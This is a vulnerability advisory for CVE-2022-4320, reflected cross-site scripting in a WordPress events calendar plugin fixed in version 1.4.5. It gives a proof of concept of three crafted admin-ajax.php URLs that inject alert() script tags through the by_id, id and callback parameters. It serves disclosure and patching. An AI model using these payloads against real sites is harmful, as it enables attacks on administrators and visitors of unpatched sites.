WordPress Plugin Vulnerabilities

WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS

Description

The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).

Proof of Concept

1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist)

Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>

2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>

3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>

Affects Plugins

Plugin icon
connect-daily-web-calendar
Fixed in 1.4.5

References

CVE
CVE-2022-4320

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
f1244c57-d886-4a6e-8cdb-18404e8c153c

Timeline

Publicly Published
2022-12-20 (about 1 years ago)
Added
2022-12-20 (about 1 years ago)
Last Updated
2022-12-20 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
CMS Tree Page View 0.8.8 - XSS
Published
2021-07-26
Title
Qyrr < 0.7 - Authenticated (contributor+) Stored XSS
Published
2023-03-27
Title
Pagination by BestWebSoft < 1.2.3 - Admin+ Stored XSS
Published
2018-09-21
Title
FV Flowplayer Video Player < 7.2.1.727 - Authenticated Cross-Site Scripting (XSS)
Published
2019-02-05
Title
YOP Poll <= 6.0.2 - Cross-Site Scripting (XSS)